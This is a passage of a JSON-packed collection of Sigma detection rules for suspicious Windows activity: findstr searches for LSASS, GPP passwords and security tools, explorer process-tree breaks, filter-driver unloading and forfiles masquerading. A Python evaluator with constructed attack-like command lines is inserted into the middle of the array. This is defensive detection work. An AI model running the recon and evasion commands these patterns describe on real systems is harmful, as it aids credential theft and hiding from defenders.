CommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    filter_optional_dell:\n        # Launched by Dell ServiceShell.exe\n        ParentImage: 'C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe'\n        CommandLine|contains: 'C:\\ProgramData\\Dell\\UpdateService\\Temp\\'\n    condition: selection_cmd and 1 of selection_folders_* and not 1 of filter_optional_*\nfalsepositives:\n    - System administrator Usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml",
    "content": "title: Explorer Process Tree Break\nid: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605\nstatus: test\ndescription: |\n  Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\n  which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\nreferences:\n    - https://twitter.com/CyberRaiju/status/1273597319322058752\n    - https://twitter.com/bohops/status/1276357235954909188?s=12\n    - https://twitter.com/nas_bench/status/1535322450858233858\n    - https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber\ndate: 2019-06-29\nmodified: 2025-10-31\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Note: See CLSID_SeparateMultipleProcessExplorerHost in the registry for reference\n    selection_factory:\n        CommandLine|contains: '/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}' # This will catch, the new explorer spawning which indicates a process/tree break. But you won't be able to catch the executing process. For that you need historical data\n    selection_root:\n        CommandLine|contains: 'explorer.exe'\n        CommandLine|contains|windash: ' /root,'\n        # There exists almost infinite possibilities to spawn from explorer. The \"/root\" flag is just an example\n        # It's better to have the ability to look at the process tree and look for explorer processes with \"weird\" flags to be able to catch this technique.\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml",
    "content": "title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell\nid: c3d76afc-93df-461e-8e67-9b2bad3f2ac4\nstatus: test\ndescription: |\n    Detects the initial execution of \"cmd.exe\" which spawns \"explorer.exe\" with the appropriate command line arguments for opening the \"My Computer\" folder.\nauthor: '@Kostastsale'\nreferences:\n    - https://ss64.com/nt/shell.html\ndate: 2022-12-22\nmodified: 2024-08-23\ntags:\n    - attack.discovery\n    - attack.t1135\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains: 'shell:mycomputerfolder'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_explorer_nouaccheck.yml",
    "content": "title: Explorer NOUACCHECK Flag\nid: 534f2ef7-e8a2-4433-816d-c91bccde289b\nstatus: test\ndescription: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks\nreferences:\n    - https://twitter.com/ORCA6665/status/1496478087244095491\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-23\nmodified: 2022-04-21\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\explorer.exe'\n        CommandLine|contains: '/NOUACCHECK'\n    filter_dc_logon:\n        - ParentCommandLine: 'C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n        - ParentImage: 'C:\\Windows\\System32\\svchost.exe' # coarse filter needed for ID 4688 Events\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Domain Controller User Logon\n    - Unknown how many legitimate software products use that method\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_download.yml",
    "content": "title: Remote File Download Via Findstr.EXE\nid: 587254ee-a24b-4335-b3cd-065c0f1f4baa\nrelated:\n    - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of \"findstr\" with specific flags and a remote share path. This specific set of CLI flags would allow \"findstr\" to download the content of the file located on the remote share as described in the LOLBAS entry.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Findstr/\n    - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-05\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1218\n    - attack.t1564.004\n    - attack.t1552.001\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr:\n        - CommandLine|contains: findstr\n        - Image|endswith: 'findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_cli_download_1:\n        CommandLine|contains|windash: ' -v '\n    selection_cli_download_2:\n        CommandLine|contains|windash: ' -l '\n    selection_cli_download_3:\n        CommandLine|contains: '\\\\\\\\'\n    condition: selection_findstr and all of selection_cli_download_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml",
    "content": "title: Findstr GPP Passwords\nid: 91a2c315-9ee6-4052-a853-6f6a8238f90d\nstatus: test\ndescription: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr\nauthor: frack113\ndate: 2021-12-27\nmodified: 2023-11-11\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'cpassword'\n            - '\\sysvol\\'\n            - '.xml'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: GPP Passwords (findstr)\n      technique: T1552.006\n      atomic_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_lnk.yml",
    "content": "title: Findstr Launching .lnk File\nid: 33339be3-148b-4e16-af56-ad16ec6c7e7b\nstatus: test\ndescription: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/\nauthor: Trent Liffick\ndate: 2020-05-01\nmodified: 2024-01-15\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1202\n    - attack.t1027.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|endswith:\n            - '.lnk'\n            - '.lnk\"'\n            - \".lnk'\"\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_lsass.yml",
    "content": "title: LSASS Process Reconnaissance Via Findstr.EXE\nid: fe63010f-8823-4864-a96b-a7b4a0f7b929\nstatus: test\ndescription: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID\nreferences:\n    - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-12\nmodified: 2024-06-04\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_findstr_cli:\n        CommandLine|contains: 'lsass'\n    selection_special:\n        CommandLine|contains|windash:\n            - ' /i \"lsass'\n            - ' /i lsass.exe'\n            - 'findstr \"lsass'\n            - 'findstr lsass'\n            - 'findstr.exe \"lsass'\n            - 'findstr.exe lsass'\n    condition: all of selection_findstr_* or selection_special\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_lsass/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml",
    "content": "title: Permission Misconfiguration Reconnaissance Via Findstr.EXE\nid: 47e4bab7-c626-47dc-967b-255608c9a920\nstatus: test\ndescription: |\n    Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords.\n    This was seen being used in combination with \"icacls\" and other utilities to spot misconfigured files or folders permissions.\nreferences:\n    - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-12\nmodified: 2023-11-11\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_findstr_cli:\n        CommandLine|contains:\n            - '\"Everyone\"'\n            - \"'Everyone'\"\n            - '\"BUILTIN\\\\\"'\n            - \"'BUILTIN\\\\'\"\n    selection_special:\n        CommandLine|contains|all:\n            # Example CLI would be: icacls \"C:\\Program Files\\*\" 2>nul | findstr \"(M)\" | findstr \"Everyone\"\n            # You could extend it for other groups and users\n            #   Example: icacls \"C:\\Program Files\\*\" 2>nul | findstr \"(M)\" | findstr \"BUILTIN\\Users\"\n            # Note: This selection only detects the command when executed from a handler such as a \"cmd /c\" or \"powershell -c\"\n            - 'icacls '\n            - 'findstr '\n            - 'Everyone'\n    condition: all of selection_findstr_* or selection_special\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output.yml",
    "content": "title: Recon Command Output Piped To Findstr.EXE\nid: ccb5742c-c248-4982-8c5c-5571b9275ad3\nrelated:\n    - id: fe63010f-8823-4864-a96b-a7b4a0f7b929\n      type: derived\nstatus: test\ndescription: |\n    Detects the execution of a potential recon command where the results are piped to \"findstr\". This is meant to trigger on inline calls of \"cmd.exe\" via the \"/c\" or \"/k\" for example.\n    Attackers often time use this technique to extract specific information they require in their reconnaissance phase.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist\n    - https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf\n    - https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-07-06\nmodified: 2025-10-08\ntags:\n    - attack.discovery\n    - attack.t1057\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # Note: Add additional CLI to increase and enhance coverage\n            # Note: We use wildcards in this instance to avoid writing a lot of variations that can be avoided easily. 
You can switch to regex if its supported by your backend.\n            - 'ipconfig*|*find'\n            - 'net*|*find'\n            - 'netstat*|*find'\n            - 'ping*|*find'\n            - 'systeminfo*|*find'\n            - 'tasklist*|*find'\n            - 'whoami*|*find'\n    filter_optional_xampp:\n        CommandLine|contains|all:\n            - 'cmd.exe /c TASKLIST /V |'\n            - 'FIND /I'\n            - '\\xampp\\'\n            - '\\catalina_start.bat'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_recon_pipe_output/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml",
    "content": "title: Security Tools Keyword Lookup Via Findstr.EXE\nid: 4fe074b4-b833-4081-8f24-7dcfeca72b42\nrelated:\n    - id: fe63010f-8823-4864-a96b-a7b4a0f7b929\n      type: derived\nstatus: test\ndescription: |\n    Detects execution of \"findstr\" to search for common names of security tools. Attackers often pipe the results of recon commands such as \"tasklist\" or \"whoami\" to \"findstr\" in order to filter out the results.\n    This detection focuses on the keywords that the attacker might use as a filter.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery\n    - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n    - https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2023-10-20\nmodified: 2023-11-14\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|endswith:\n            # Note: Add additional keywords to increase and enhance coverage\n            # Note:\n            #   We use the double quote variation because in cases of where the command is executed through cmd for example:\n            #       cmd /c \"tasklist | findstr virus\"\n            #   Logging utilties such as Sysmon would capture the end quote as part of findstr execution\n            - ' avira'\n            - ' avira\"'\n            - ' cb'\n            - ' cb\"'\n            - ' cylance'\n            - ' cylance\"'\n           
 - ' defender'\n            - ' defender\"'\n            - ' kaspersky'\n            - ' kaspersky\"'\n            - ' kes'\n            - ' kes\"'\n            - ' mc'\n            - ' mc\"'\n            - ' sec'\n            - ' sec\"'\n            - ' sentinel'\n            - ' sentinel\"'\n            - ' symantec'\n            - ' symantec\"'\n            - ' virus'\n            - ' virus\"'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Security Software Discovery\n      technique: T1518.001\n      atomic_guid: f92a380f-ced9-491f-b338-95a991418ce2\n"
  },
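The "Potentially Suspicious Cabinet File Expansion" rule (windash modifier, `1 of selection_folders_*`, optional filters), the "Recon Command Output Piped To Findstr.EXE" rule (wildcard values such as `tasklist*|*find`) and the trailing-quote note in "Security Tools Keyword Lookup Via Findstr.EXE" are easier to reason about once the conditions are actually evaluated. The following is an added example, not code from the Sigma project or pySigma: a small Python evaluator that reimplements only the matching behaviour these rules need and runs two of them over constructed Sysmon-style events. The event contents, the `EVENTS`/`EXPAND_RULE`/`RECON_PIPE_RULE` names and the simplified windash expansion (every `-` replaced by `/` and the Unicode dashes) are assumptions; Sigma's backslash escaping is not implemented, so pattern values are taken literally.

```python
"""Added example (not Sigma or pySigma code): a minimal evaluator that runs two of the rules
above over constructed events, reimplementing just enough of Sigma matching (case-insensitive,
'*'/'?' wildcards, contains/startswith/endswith/all/windash). Sigma's backslash escaping is
not implemented: pattern values are taken literally."""
import re

DASHES = ("-", "/", "\u2013", "\u2014", "\u2015")  # '-', '/', en dash, em dash, horizontal bar

def windash_variants(value):
    """Sigma 'windash': an option written with '-' must also match '/' and the Unicode
    dashes Windows command parsers accept. Simplified: every '-' in the value is expanded."""
    return [value.replace("-", dash) for dash in DASHES] if "-" in value else [value]

def glob_to_regex(value):
    """Sigma values are globs: '*' is any run of characters, '?' one character."""
    return "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in value)

def match_value(field_value, pattern, modifiers):
    """Match one event field against one pattern under the given Sigma modifiers."""
    variants = windash_variants(pattern) if "windash" in modifiers else [pattern]
    for variant in variants:
        rx = glob_to_regex(variant)
        if "contains" in modifiers:
            rx = ".*" + rx + ".*"
        elif "endswith" in modifiers:
            rx = ".*" + rx
        elif "startswith" in modifiers:
            rx = rx + ".*"
        if re.fullmatch(rx, field_value, re.IGNORECASE | re.DOTALL):
            return True
    return False

def match_selection(event, selection):
    """Dict: AND over fields, OR over a field's values (AND if 'all'); list of dicts: OR."""
    if isinstance(selection, list):
        return any(match_selection(event, sub) for sub in selection)
    for key, values in selection.items():
        field, *mods = key.split("|")
        values = values if isinstance(values, list) else [values]
        hits = [match_value(event.get(field, ""), v, mods) for v in values]
        if not (all(hits) if "all" in mods else any(hits)):
            return False
    return True

# "Potentially Suspicious Cabinet File Expansion" transcribed from the YAML above.
EXPAND_RULE = {
    "selection_cmd": {"Image|endswith": "\\expand.exe", "CommandLine|contains|windash": "-F:"},
    "selection_folders_1": {"CommandLine|contains": [
        ":\\Perflogs\\", ":\\ProgramData", ":\\Users\\Public\\", ":\\Windows\\Temp\\", "\\Admin$\\",
        "\\AppData\\Local\\Temp\\", "\\AppData\\Roaming\\", "\\C$\\", "\\Temporary Internet"]},
    "selection_folders_2": [
        {"CommandLine|contains|all": [":\\Users\\", "\\Favorites\\"]},
        {"CommandLine|contains|all": [":\\Users\\", "\\Favourites\\"]},
        {"CommandLine|contains|all": [":\\Users\\", "\\Contacts\\"]}],
    "filter_optional_dell": {
        "ParentImage": "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe",
        "CommandLine|contains": "C:\\ProgramData\\Dell\\UpdateService\\Temp\\"},
}

def expand_rule_matches(event):
    """condition: selection_cmd and 1 of selection_folders_* and not 1 of filter_optional_*"""
    def sel(name):
        return match_selection(event, EXPAND_RULE[name])
    folders = any(sel(n) for n in EXPAND_RULE if n.startswith("selection_folders_"))
    filtered = any(sel(n) for n in EXPAND_RULE if n.startswith("filter_optional_"))
    return sel("selection_cmd") and folders and not filtered

# "Recon Command Output Piped To Findstr.EXE" transcribed from the YAML above.
RECON_PIPE_RULE = {
    "selection": {"CommandLine|contains": [
        "ipconfig*|*find", "net*|*find", "netstat*|*find", "ping*|*find",
        "systeminfo*|*find", "tasklist*|*find", "whoami*|*find"]},
    "filter_optional_xampp": {"CommandLine|contains|all": [
        "cmd.exe /c TASKLIST /V |", "FIND /I", "\\xampp\\", "\\catalina_start.bat"]},
}

def recon_pipe_rule_matches(event):
    """condition: selection and not 1 of filter_optional_*"""
    return (match_selection(event, RECON_PIPE_RULE["selection"])
            and not match_selection(event, RECON_PIPE_RULE["filter_optional_xampp"]))

# Constructed Sysmon-style process creation events (hypothetical; not taken from the page).
EVENTS = {
    "expand_user_temp": {  # .cab unpacked from a user temp dir, '-' style option
        "Image": "C:\\Windows\\System32\\expand.exe",
        "CommandLine": "expand.exe -F:* C:\\Users\\bob\\AppData\\Local\\Temp\\stage.cab C:\\Users\\bob\\AppData\\Local\\Temp\\",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    "expand_dell": {  # same tool with a '/' style option, but the Dell updater parent is filtered out
        "Image": "C:\\Windows\\System32\\expand.exe",
        "CommandLine": "expand.exe /F:* C:\\ProgramData\\Dell\\UpdateService\\Temp\\pkg.cab C:\\ProgramData\\Dell\\UpdateService\\Temp\\out",
        "ParentImage": "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe"},
    "tasklist_pipe": {  # inline cmd /c with recon output piped to findstr
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "cmd.exe /c \"tasklist /v | findstr lsass\"",
        "ParentImage": "C:\\Users\\bob\\Downloads\\update.exe"},
}

def evaluate_all():
    """Return {event name: [ids of matching rules]} for the constructed events."""
    rules = [("9f107a84-532c-41af-b005-8d12a607639f", expand_rule_matches),
             ("ccb5742c-c248-4982-8c5c-5571b9275ad3", recon_pipe_rule_matches)]
    return {name: [rid for rid, fn in rules if fn(ev)] for name, ev in EVENTS.items()}
```

Calling `evaluate_all()` flags `expand_user_temp` for the cabinet rule, drops `expand_dell` because the Dell filter matches even though `/F:` is caught by the windash expansion, and flags `tasklist_pipe` for the recon rule. `match_value('cmd /c "tasklist | findstr virus"', ' virus"', ["endswith"])` is true while the unquoted `' virus'` variant is not, which is exactly why the keyword lookup rule lists both forms.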
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_subfolder_search.yml",
    "content": "title: Insensitive Subfolder Search Via Findstr.EXE\nid: 04936b66-3915-43ad-a8e5-809eadfd1141\nrelated:\n    - id: bf6c39fc-e203-45b9-9538-05397c1b4f3f\n      type: obsolete\nstatus: test\ndescription: |\n    Detects execution of findstr with the \"s\" and \"i\" flags for a \"subfolder\" and \"insensitive\" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Findstr/\n    - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-05\nmodified: 2024-03-05\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1218\n    - attack.t1564.004\n    - attack.t1552.001\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_findstr:\n        - CommandLine|contains: findstr\n        - Image|endswith: 'findstr.exe'\n        - OriginalFileName: 'FINDSTR.EXE'\n    selection_cli_search_subfolder:\n        CommandLine|contains|windash: ' -s '\n    selection_cli_search_insensitive:\n        CommandLine|contains|windash: ' -i '\n    condition: selection_findstr and all of selection_cli_search_*\nfalsepositives:\n    - Administrative or software activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml",
    "content": "title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE\nid: 37db85d1-b089-490a-a59a-c7b6f984f480\nstatus: test\ndescription: Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service\nauthor: frack113\ndate: 2021-12-16\nmodified: 2023-11-14\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\find.exe'\n              - '\\findstr.exe'\n        - OriginalFileName:\n              - 'FIND.EXE'\n              - 'FINDSTR.EXE'\n    selection_cli:\n        CommandLine|contains: ' 385201' # Sysmon driver default altitude\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_finger_execution.yml",
    "content": "title: Finger.EXE Execution\nid: af491bca-e752-4b44-9c86-df5680533dbc\nrelated:\n    - id: c082c2b0-525b-4dbc-9a26-a57dc4692074\n      type: similar\n    - id: 2fdaf50b-9fd5-449f-ba69-f17248119af6\n      type: similar\nstatus: test\ndescription: |\n    Detects execution of the \"finger.exe\" utility.\n    Finger.EXE or \"TCPIP Finger Command\" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.\n    Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of \"finger.exe\" can be considered \"suspicious\" and worth investigating.\nreferences:\n    - https://twitter.com/bigmacjpg/status/1349727699863011328?s=12\n    - https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/\n    - http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt\nauthor: Florian Roth (Nextron Systems), omkar72, oscd.community\ndate: 2021-02-24\nmodified: 2024-06-27\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'finger.exe'\n        - Image|endswith: '\\finger.exe'\n    condition: selection\nfalsepositives:\n    - Admin activity (unclear what they do nowadays with finger.exe)\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml",
    "content": "title: Filter Driver Unloaded Via Fltmc.EXE\nid: 4931188c-178e-4ee7-a348-39e8a7a56821\nrelated:\n    - id: 4d7cda18-1b12-4e52-b45c-d28653210df8 # Sysmon specific\n      type: derived\nstatus: test\ndescription: Detect filter driver unloading activity via fltmc.exe\nreferences:\n    - https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon\n    - https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-13\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1562\n    - attack.t1562.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\fltMC.exe'\n        - OriginalFileName: 'fltMC.exe'\n    selection_cli:\n        CommandLine|contains: 'unload'\n    filter_optional_avira:\n        ParentImage|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - ':\\Windows\\Temp\\'\n        ParentImage|endswith: '\\endpoint-protection-installer-x64.tmp'\n        CommandLine|endswith:\n            - 'unload rtp_filesystem_filter'\n            - 'unload rtp_filter'\n    filter_optional_manageengine:\n        ParentImage: 'C:\\Program Files (x86)\\ManageEngine\\uems_agent\\bin\\dcfaservice64.exe'\n        CommandLine|endswith: 'unload DFMFilter'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml",
    "content": "title: Sysmon Driver Unloaded Via Fltmc.EXE\nid: 4d7cda18-1b12-4e52-b45c-d28653210df8\nrelated:\n    - id: 4931188c-178e-4ee7-a348-39e8a7a56821 # Generic\n      type: similar\nstatus: test\ndescription: Detects possible Sysmon filter driver unloaded via fltmc.exe\nreferences:\n    - https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon\nauthor: Kirill Kiryanov, oscd.community\ndate: 2019-10-23\nmodified: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1562\n    - attack.t1562.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\fltMC.exe'\n        - OriginalFileName: 'fltMC.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'unload'\n            - 'sysmon'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml",
    "content": "title: Forfiles.EXE Child Process Masquerading\nid: f53714ec-5077-420e-ad20-907ff9bb2958\nstatus: test\ndescription: |\n    Detects the execution of \"forfiles\" from a non-default location, in order to potentially spawn a custom \"cmd.exe\" from the current working directory.\nreferences:\n    - https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/\nauthor: Nasreddine Bencherchali (Nextron Systems), Anish Bogati\ndate: 2024-01-05\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Notes:\n        #   - The parent must not have CLI options\n        #   - The Child Image must be named \"cmd\" as its hardcoded in the \"forfiles\" binary\n        #   - The Child CLI will always contains \"/c echo\" as its hardcoded in the original \"forfiles\" binary\n        ParentCommandLine|endswith:\n            - '.exe'\n            - '.exe\"'\n        Image|endswith: '\\cmd.exe'\n        CommandLine|startswith: '/c echo \"'\n    filter_main_parent_not_sys:\n        ParentImage|contains:\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n        ParentImage|endswith: '\\forfiles.exe'\n        Image|contains:\n            - ':\\Windows\\System32\\'\n            - ':\\Windows\\SysWOW64\\'\n        Image|endswith: '\\cmd.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_forfiles_proxy_execution_.yml",
